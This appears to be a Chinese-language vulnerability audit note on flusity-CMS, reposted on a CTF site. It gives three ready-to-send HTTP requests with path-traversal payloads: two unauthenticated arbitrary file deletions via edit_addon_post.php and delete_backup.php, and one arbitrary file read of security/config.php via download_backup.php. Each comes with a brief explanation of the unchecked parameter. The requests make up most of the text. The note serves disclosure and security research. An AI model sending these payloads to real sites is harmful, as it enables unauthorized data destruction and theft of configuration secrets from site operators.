flusity-CMS 审计笔记

渗透技巧 7个月前 admin
112 0 0

https://github.com/flusity/flusity-CMS/archive/refs/tags/v2.325.zip

未授权任意文件删除

POST /cover/addons/jd_simple_zer/action/edit_addon_post.php HTTP/1.1
Host: flusitycms.test
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

db_img_name=../../1.txt
flusity-CMS 审计笔记

flusity-CMS-2.33\cover\addons\jd_simple_zer\action\edit_addon_post.php

flusity-CMS 审计笔记
通过 POST 方法获取参数 $db_img_name  未经校验就拼接到参数 $old_selected_file 中,最后调用函数 unlink 来对文件进行删除,所以可以跨目录的删除任意文件。

GET /core/tools/delete_backup.php?file=../../1.txt HTTP/1.1
Host: flusitycms.test
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
flusity-CMS 审计笔记

flusity-CMS-2.33\core\tools\delete_backup.php

flusity-CMS 审计笔记
通过 GET 方法获取参数 file  未经校验就拼接到参数 $filePath 中,最后调用函数 unlink 来对文件进行删除,所以可以跨目录的删除任意文件。

未授权任意文件读取

GET /core/tools/download_backup.php?file=../../../security/config.php HTTP/1.1
Host: flusitycms.test
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
flusity-CMS 审计笔记

flusity-CMS-2.325\core\tools\download_backup.php

flusity-CMS 审计笔记
通过 GET 方式获取参数 file  最后拼接到 $filePath 中,但是并未做任何校验,通过 ../ 就可以实现跨目录的读取操作。

原文始发于火线(GoTTY):flusity-CMS 审计笔记

版权声明:admin 发表于 2024年4月1日 下午2:22。
转载请注明:flusity-CMS 审计笔记 | CTF导航

相关文章